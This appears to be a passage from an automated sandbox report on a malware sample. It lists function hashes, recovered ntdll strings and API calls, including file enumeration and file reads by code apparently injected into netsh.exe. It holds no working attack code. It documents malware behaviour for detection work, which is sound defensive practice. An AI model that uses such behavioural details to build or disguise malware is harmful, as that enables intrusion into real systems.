                                                                                                      • Opcode ID: 7b02c75a4040c4524f1a2d0fe1e692690b05c1be279845e24bd38f9adf66a1f0
                                                                                                      • Instruction ID: 19e0a5e4c103cdd1bf491cafbe108d2ecde507841e7f36ec1b5082ddf955d0b4
                                                                                                      • Opcode Fuzzy Hash: 7b02c75a4040c4524f1a2d0fe1e692690b05c1be279845e24bd38f9adf66a1f0
                                                                                                      • Instruction Fuzzy Hash: D590023120140842D2C47159850464A000597D1301F95C015B4126654DCB158B597BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6b181da82cece71b6175d24ba86b8ac274e6ae0b61dfe0cafdb9820a7083b9c7
                                                                                                      • Instruction ID: 1d28bb7694b7f5605ac896ab9eb616b7bb188f8aaced4e48ccae7e16c1a4b1c4
                                                                                                      • Opcode Fuzzy Hash: 6b181da82cece71b6175d24ba86b8ac274e6ae0b61dfe0cafdb9820a7083b9c7
                                                                                                      • Instruction Fuzzy Hash: F290023120544882D28471598504A46001597D0305F55C011B4165694DD7258E55BB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9e61b1f854905efb18a1518748402e86acb80350bae891fcbcf115278571b97a
                                                                                                      • Instruction ID: bdab0e2ad91629e75a6f25d365129298159e6363ed3d355611bde337074782dd
                                                                                                      • Opcode Fuzzy Hash: 9e61b1f854905efb18a1518748402e86acb80350bae891fcbcf115278571b97a
                                                                                                      • Instruction Fuzzy Hash: E09002A1201540D24644B259C504B0A450597E0201B55C016F5155560CC62589519635
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 625676495d9c30f2490b08deb6362c66b9110839ce9a4372c5072946f2b7ea45
                                                                                                      • Instruction ID: 90088e61a7f81a258cf0089c22f627727ddcac1952e9718ef0d1508beb901324
                                                                                                      • Opcode Fuzzy Hash: 625676495d9c30f2490b08deb6362c66b9110839ce9a4372c5072946f2b7ea45
                                                                                                      • Instruction Fuzzy Hash: 1190043531140043034DF55D47045070047D7D5351355C031F5117550CD731CD715731
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 46a72cabb927d9e002215a2c375cda0dea3a37bd3a081cea5c1b09e091db1b90
                                                                                                      • Instruction ID: 495315903ff5226c47ac7380e96e7ff115bfaae1b2acaea0840e52888278e507
                                                                                                      • Opcode Fuzzy Hash: 46a72cabb927d9e002215a2c375cda0dea3a37bd3a081cea5c1b09e091db1b90
                                                                                                      • Instruction Fuzzy Hash: 01900225221400420289B559470450B0445A7D6351395C015F5517590CC72189655721
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 29bed35ff5857e71ae1d64a3446f8766ffae59ecb02cec37b012b31ed8c29afd
                                                                                                      • Instruction ID: 584fd872d516efbba17e4d8d1e7c8da3806ccafe10ac59ae3101f458b43a0752
                                                                                                      • Opcode Fuzzy Hash: 29bed35ff5857e71ae1d64a3446f8766ffae59ecb02cec37b012b31ed8c29afd
                                                                                                      • Instruction Fuzzy Hash: 2D90022921340042D2C47159950860A000597D1202F95D415B4116558CCA1589695721
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4711f94f9984e5a9b5a4246d9b0e20cb0b219764990ada7f50918ec06d5f4658
                                                                                                      • Instruction ID: 5d6a3441e414a4e4c55f0dc8982af58f86585b23ef9ef5742d25eba54bc4c03b
                                                                                                      • Opcode Fuzzy Hash: 4711f94f9984e5a9b5a4246d9b0e20cb0b219764990ada7f50918ec06d5f4658
                                                                                                      • Instruction Fuzzy Hash: D790027120140442D28471598504746000597D0301F55C011B9165554EC7598ED56B65
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 557806072297851b67b7f1381cf75eb5d412c4b5f437e83f03b49c2a8d07fa95
                                                                                                      • Instruction ID: 95d9a0a0faa6a1761466a5f18414c51a6c9ea1fc1c0059d14f6a14b1de26f43a
                                                                                                      • Opcode Fuzzy Hash: 557806072297851b67b7f1381cf75eb5d412c4b5f437e83f03b49c2a8d07fa95
                                                                                                      • Instruction Fuzzy Hash: 6590026120180443D28475598904607000597D0302F55C011B6165555ECB298D516635
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 31d8127e07027725c1e2f86fa58cd4fa1bd2a9bcd1b1e5e9d39aa6b888c1a090
                                                                                                      • Instruction ID: 8919e6f4564739e942c6d6d8480cb097cad5d9f1e9d392ba7baf544942104474
                                                                                                      • Opcode Fuzzy Hash: 31d8127e07027725c1e2f86fa58cd4fa1bd2a9bcd1b1e5e9d39aa6b888c1a090
                                                                                                      • Instruction Fuzzy Hash: F190022120184482D28472598904B0F410597E1202F95C019B8257554CCA1589555B21
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67548db5667262d7340767dabd670e694bb79a3144ea05f0c2232806d38927da
                                                                                                      • Instruction ID: 03ca3d4526d432cda6b6fbf3b1bef21d2c7992b8c7367f9471388c3da6188b40
                                                                                                      • Opcode Fuzzy Hash: 67548db5667262d7340767dabd670e694bb79a3144ea05f0c2232806d38927da
                                                                                                      • Instruction Fuzzy Hash: 6090022124140842D2847159C5147070006D7D0601F55C011B4125554DC7168A656BB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6bfae05ecb8c1e4b20c7ef55aa4cc8b43e9b5e73a9bdba8eb60570299538d918
                                                                                                      • Instruction ID: b1d7b93b38f68974beded4e29cc287269dce8b692827e329286a1bc17c121b78
                                                                                                      • Opcode Fuzzy Hash: 6bfae05ecb8c1e4b20c7ef55aa4cc8b43e9b5e73a9bdba8eb60570299538d918
                                                                                                      • Instruction Fuzzy Hash: DD90022124545142D294715D85046164005B7E0201F55C021B4915594DC65589556721
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c3dac78a2989cb8a47c8d408b0019caab0e9bbad4df4cd6961f186728cd5c801
                                                                                                      • Instruction ID: f3001ccabee9658fad213964d6916bac5d2698f27745fc03fba7d98a3b2ffc42
                                                                                                      • Opcode Fuzzy Hash: c3dac78a2989cb8a47c8d408b0019caab0e9bbad4df4cd6961f186728cd5c801
                                                                                                      • Instruction Fuzzy Hash: E490023120240182968472599904A4E410597E1302B95D415B4116554CCA1489615721
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b514e8486af6882acf54f6e088241e9d2459481fafba5421fe8e5768d350fa87
                                                                                                      • Instruction ID: eb58830634739aa2cb74c9932e13459a911b5db366df3f0b7d8c99649fd1f8b0
                                                                                                      • Opcode Fuzzy Hash: b514e8486af6882acf54f6e088241e9d2459481fafba5421fe8e5768d350fa87
                                                                                                      • Instruction Fuzzy Hash: 6190023520140442D65471599904646004697D0301F55D411B4525558DC75489A1A621
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                      • Instruction ID: 95d71ea93b97971d4c628585624557967cba44245bbc6b0d2c6a21d630ac6304
                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • Execute=1, xrefs: 01174713
                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011746FC
                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01174742
                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01174725
                                                                                                      • ExecuteOptions, xrefs: 011746A0
                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01174787
                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01174655
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                      • API String ID: 0-484625025
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-$0$0
                                                                                                      • API String ID: 1302938615-699404926
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                      • API String ID: 48624451-2819853543
                                                                                                      • Opcode ID: 8a12ddf2b3566c786fc39c333225da38f5ed62bb37022ca87c7a2f6572a4fffb
                                                                                                      • Instruction ID: 7d8f5adf95a430735085d387e45cc4d502377805fb007f00a4216e1b3bfe311c
                                                                                                      • Opcode Fuzzy Hash: 8a12ddf2b3566c786fc39c333225da38f5ed62bb37022ca87c7a2f6572a4fffb
                                                                                                      • Instruction Fuzzy Hash: 8121777AA00119ABDB14DF79DC80AFEBBF8EF54654F04011AEE15D7200E730E9068BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 0117031E
                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011702E7
                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011702BD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                      • API String ID: 0-2474120054
                                                                                                      • Opcode ID: 6280860ce52b0dfdd55c097c1a234916f2a3d63614bd2e364b6610dbdcc446d2
                                                                                                      • Instruction ID: 5078296f426f8f9de4108b5daaaebbaa6c981b4cfffad1c03e9237fe069ea531
                                                                                                      • Opcode Fuzzy Hash: 6280860ce52b0dfdd55c097c1a234916f2a3d63614bd2e364b6610dbdcc446d2
                                                                                                      • Instruction Fuzzy Hash: CBE1AB316087529FD72DCF28C884B2ABBF0AB89724F144A2DF5A58B3D1D774D856CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 01177BAC
                                                                                                      • RTL: Resource at %p, xrefs: 01177B8E
                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01177B7F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 0-871070163
                                                                                                      • Opcode ID: 8bec0996a3b62f787ab37cc902aee58a5b50b78840fab5697bd4426a67d3fb76
                                                                                                      • Instruction ID: 517cdcb1de5deba8e1203100f9a518ee6b6cd543d9b2e8718ff6534595a8f651
                                                                                                      • Opcode Fuzzy Hash: 8bec0996a3b62f787ab37cc902aee58a5b50b78840fab5697bd4426a67d3fb76
                                                                                                      • Instruction Fuzzy Hash: BC41F6313057039FD728DE29C840B6AB7E5EF84724F100A2DF95ADB780E731E4058B96
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0117728C
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 011772C1
                                                                                                      • RTL: Resource at %p, xrefs: 011772A3
                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01177294
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 885266447-605551621
                                                                                                      • Opcode ID: 9c8d92e1b50014c07a0d764fb28de8232d94e80cc55f1fd1f98a5c56c617412a
                                                                                                      • Instruction ID: 46443e4620bb60436479b58316b1e60364533200a68318e7f7b8bf6863cc1bd3
                                                                                                      • Opcode Fuzzy Hash: 9c8d92e1b50014c07a0d764fb28de8232d94e80cc55f1fd1f98a5c56c617412a
                                                                                                      • Instruction Fuzzy Hash: 2E410331704202ABC728DE29CC45F6AB7B5FF94714F104A19F965EB380EB30E8468BD5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$]:%u
                                                                                                      • API String ID: 48624451-3050659472
                                                                                                      • Opcode ID: a16c7648dd5ca1b698310a72adbdff18226f3966242d7880bb1b45433d917c34
                                                                                                      • Instruction ID: 354de0d5d23ad8e2bbf8bbee5371fca43cad0a6f35bbb6ffd83fa1f6c1685a65
                                                                                                      • Opcode Fuzzy Hash: a16c7648dd5ca1b698310a72adbdff18226f3966242d7880bb1b45433d917c34
                                                                                                      • Instruction Fuzzy Hash: 62319A726012199FDB24DF2DCC80BEE77F8EF48614F440559E949D3100EB30AA498B60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-
                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                      • Instruction ID: a172ee15651aae1b94f5dacac1068885d9bb1ee67feb9a303e9c2a5ec14952c4
                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                      • Instruction Fuzzy Hash: 9491B171E002169BEF2CDF6DC890ABEBBA5FF44B20F54461AE965E72C0D73099418B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$@
                                                                                                      • API String ID: 0-1194432280
                                                                                                      • Opcode ID: 0cca8a5570251be606454a49dea01871ecfe36d1512397686da4a4cf5ed64797
                                                                                                      • Instruction ID: c9399d2679ce112a74a29f8e0e64d0fc4f759bd6c6f3e3b400b29f60060ddb17
                                                                                                      • Opcode Fuzzy Hash: 0cca8a5570251be606454a49dea01871ecfe36d1512397686da4a4cf5ed64797
                                                                                                      • Instruction Fuzzy Hash: 65811B71D012699BDB399B54CC54BEAB6B8AF08754F0041EAEA1DB7280D7715E84CFA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:2.4%
                                                                                                      Total number of Nodes:420
                                                                                                      Total number of Limit Nodes:66

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C$,$1$1$2$6$9$;O$<$<-$B$Ep$H$I$_$jZ$nc$wW$x$}$ $7$L$i$}
                                                                                                      • API String ID: 0-4254166177
                                                                                                      • Opcode ID: 701afc884af9f53524de023afd2e908aadc33d9ec2389d3eac306fd31ff74744
                                                                                                      • Instruction ID: 9dc5fd1718ac354aa419f45cf30d3117de881b1dc4f09b4456e4b934fed76ce5
                                                                                                      • Opcode Fuzzy Hash: 701afc884af9f53524de023afd2e908aadc33d9ec2389d3eac306fd31ff74744
                                                                                                      • Instruction Fuzzy Hash: 6312ADB0D05229CBEB24CF45C894BEDBBB2FB44308F2481D9D1496B392C7B95A89DF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 00C1B7F4
                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 00C1B82F
                                                                                                      • FindClose.KERNELBASE(?), ref: 00C1B83A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 3541575487-0
                                                                                                      • Opcode ID: 1d473383974680754585aace9c030498db415fb415f930e95e21ff184487225f
                                                                                                      • Instruction ID: 88a4cd21db68e6e58512b79205e767844952823e197bb3f3a7595608b7e82ece
                                                                                                      • Opcode Fuzzy Hash: 1d473383974680754585aace9c030498db415fb415f930e95e21ff184487225f
                                                                                                      • Instruction Fuzzy Hash: D3316E71A00348BBEB20DFA0CC85FEF777CAF45B05F144459F918A6191DA70AE85DBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00C276F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: ff238927d6e438750ecf7d8393effdb85e04f43f862e0f60662f41dc9b5c0b1e
                                                                                                      • Instruction ID: c95988989c3079e74bde3958b312f1f79642c00ca0ed319c821e432f4c89a4f3
                                                                                                      • Opcode Fuzzy Hash: ff238927d6e438750ecf7d8393effdb85e04f43f862e0f60662f41dc9b5c0b1e
                                                                                                      • Instruction Fuzzy Hash: AC31D3B5A01608AFDB14DF99D881EDEB7F9EF8C314F508219F918A3340D770A851CBA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00C2783B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 07f1b093c8ac46202dd93a3a0b20a7864efae37e8d884af7c551f8ee2be6021f
                                                                                                      • Instruction ID: d170dfdfa9036cc65e84249a82546087425a961c7cd7996895b239e615a293b0
